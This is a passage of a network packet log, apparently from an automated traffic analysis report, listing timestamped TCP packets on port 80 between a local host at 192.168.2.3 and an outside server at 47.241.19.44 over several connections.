Nov 23, 2020 16:12:54.375715017 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375730991 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375751019 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375756025 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.375768900 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.375787973 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.375792027 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.417395115 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.454989910 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.511130095 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.525857925 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.525882959 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.525898933 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.525916100 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.525933027 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:54.525990963 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.526031017 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.801994085 CET	49746	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:54.842041969 CET	49747	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:55.072050095 CET	80	49746	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:55.103810072 CET	80	49747	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:55.103951931 CET	49747	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:55.104048014 CET	49747	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:55.408580065 CET	80	49747	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:56.332869053 CET	80	49747	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:56.333054066 CET	49747	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.333081007 CET	49747	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.433402061 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.595110893 CET	80	49747	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:56.701893091 CET	80	49749	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:56.702033997 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.702212095 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.702223063 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:56.971184015 CET	80	49749	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:57.723793983 CET	80	49749	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:57.725402117 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:57.733434916 CET	49749	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:57.787298918 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:58.001707077 CET	80	49749	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:58.049032927 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:58.049227953 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:58.049351931 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:58.352612972 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.049961090 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.049995899 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050019979 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050040960 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050064087 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050082922 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.050087929 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050112963 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050139904 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.050141096 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050168991 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050189972 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.050192118 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.050232887 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.050278902 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.311817884 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.311877966 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.311919928 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.311958075 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.311992884 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312006950 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312052011 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312092066 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312120914 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312133074 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312172890 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312206030 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312210083 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312249899 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312289953 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312297106 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312336922 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312371969 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312412977 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312452078 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312491894 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312493086 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312531948 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.312561989 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.312903881 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.450696945 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.450737000 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.450849056 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.574103117 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574139118 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574151993 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574165106 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574177980 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574193954 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574208021 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574223042 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574239016 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574254990 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574270964 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574274063 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.574291945 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574309111 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574323893 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574338913 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.574341059 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574345112 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.574357033 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.574378967 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.575778008 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651252985 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651304007 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651339054 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651381969 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651424885 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651456118 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651477098 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651484966 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651514053 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651550055 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651582956 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651585102 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651618958 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651650906 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651654005 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651698112 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651737928 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651768923 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651772976 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651808977 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651843071 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.651874065 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.651876926 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.652129889 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.699723005 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.712460995 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.764975071 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.851846933 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851878881 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851896048 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851917982 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851937056 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851952076 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851969957 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851982117 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.851985931 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.851999998 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852005959 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852024078 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852035046 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852041006 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852061033 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852077961 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852087021 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852093935 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852111101 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852125883 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852137089 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852142096 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852159023 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.852179050 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852185965 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.852332115 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:12:59.913589001 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:12:59.965545893 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.052401066 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052481890 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052546978 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052604914 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052671909 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052731991 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052788019 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052805901 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.052834988 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.052850008 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052908897 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.052964926 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053025007 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053078890 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.053085089 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053118944 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.053155899 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053216934 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053266048 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053307056 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.053318977 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053378105 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053466082 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.053534031 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.054052114 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.113923073 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.171473980 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.252749920 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252777100 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252794027 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252810955 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252826929 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252842903 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252846003 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.252860069 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252880096 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252898932 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252907991 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.252916098 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252933025 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252948999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252964973 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.252966881 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.252985001 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.252985954 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253002882 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253021955 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253022909 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.253040075 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253056049 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253071070 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.253071070 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.253124952 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.297132015 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.297205925 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.315126896 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.355365992 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.453960896 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.453989983 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454006910 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454022884 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454041004 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454057932 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454075098 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454082012 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454092979 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454112053 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454129934 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454130888 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454147100 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454164028 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454170942 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454180002 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454196930 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454204082 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454215050 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454231977 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454241037 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454252005 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454271078 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454271078 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.454288960 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.454353094 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.514589071 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.558501959 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.558804989 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.558825970 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.558870077 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.617177010 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653841019 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653867960 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653887033 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653903961 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653924942 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653942108 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653951883 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.653958082 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653975010 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.653991938 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654007912 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654026031 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654042006 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654088974 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.654098034 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654114962 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654145002 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654160976 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654191017 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.654247999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654257059 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.654314041 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654324055 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.654333115 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.654422998 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.715939999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.741810083 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.741835117 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.741852999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.741871119 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.741894960 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.820168018 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854518890 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854552031 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854571104 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854589939 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854613066 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854623079 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854639053 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854650021 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854659081 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854676008 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854693890 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854713917 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854727030 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854732037 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854754925 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854763985 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854774952 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854792118 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854798079 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854809999 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854813099 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854829073 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854846001 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854849100 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854866028 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854882956 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.854907036 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.854933023 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.915596008 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.942264080 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.942291975 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.942303896 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.942317963 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:00.942332029 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:00.942357063 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.003501892 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054897070 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054929972 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054949045 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054964066 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054971933 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.054980040 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.054997921 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055012941 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055016994 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055032015 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055046082 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055047989 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055068970 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055080891 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055085897 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055103064 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055109978 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055121899 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055136919 CET	80	49750	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:01.055140972 CET	49750	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:01.055155993 CET	80	49750	47.241.19.44	192.168.2.3
